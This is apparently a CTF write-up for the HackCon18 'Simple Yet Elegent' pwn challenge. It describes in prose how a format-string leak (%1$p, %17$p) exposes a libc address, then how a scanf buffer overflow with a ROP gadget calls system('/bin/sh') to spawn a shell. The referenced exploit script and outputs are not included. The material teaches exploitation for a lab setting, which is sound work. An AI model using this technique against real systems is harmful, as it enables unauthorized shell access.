Hey guys, it’s just finished the HackCon18 ctf, let’s see the writeup of Simple Yet Elegent pwn. This pwn is based on format string vulnerability and buffer overflow, then our target is leak an address of libc with the format string (because we suppose that ASLR is enabled), and then calculate remote system for spawn a shell.
The first step is see what protection are enabled:
how we can see is all disabled except NX protection. Try now to execute the binary:
Ok, the process return our input, try now with a format string:
How we can see, there are addresses of process’s stack, again if we insert a big input:
there is a segmentation fault. Let’s jump in radare 2 for see the assembly code of this binary:
the main function get an input, with a scanf, and in this point there is an overflow. Examine now the core dump created with gdb:
In this way we calculated the size of buffer. Now we must examine the stack for search an address of libc to leak with format string. For this purpose we must run the program in gdb and break in printf function because with format string we get the memory stack of printf:
Good, there is an address of libc_start_main, but there is a problem, if we insert a big input for overflow the return address, our input overflow this address! Then we search another address of libc and then use it. In particular there is 0x00007ffff7a6287d that is at init of our format string, but only in remote! (For the moment I do not know why, but maybe is due to the different libc version). This address maybe is the fflush function but I’m not sure, then we calculate the difference from this value to libc_start_main to obtain the latter.
Run the remote process to obtain this two values:
where %1$p is the offset to obtain our mysterious address, and %17$p is the offset to obtain libc_start_main. The difference between this two address is:
Ok, now we have a valid address to libc! Now we get the init of libc_start_main and then search the system offset and bin sh. For this purpose we examine the libc that has been given to us:
where 0x21f45 corresponds to libc_start_main leaked, that is ad 245 byte from init of libc_start_main! Now we can calculate libc base and then system and bin sh! Run now libc database for get the offset of system and binsh:
Now, search for gadget to put bin sh address in rdi register:
Ok now we have all the ingredients for our script:
Now run it: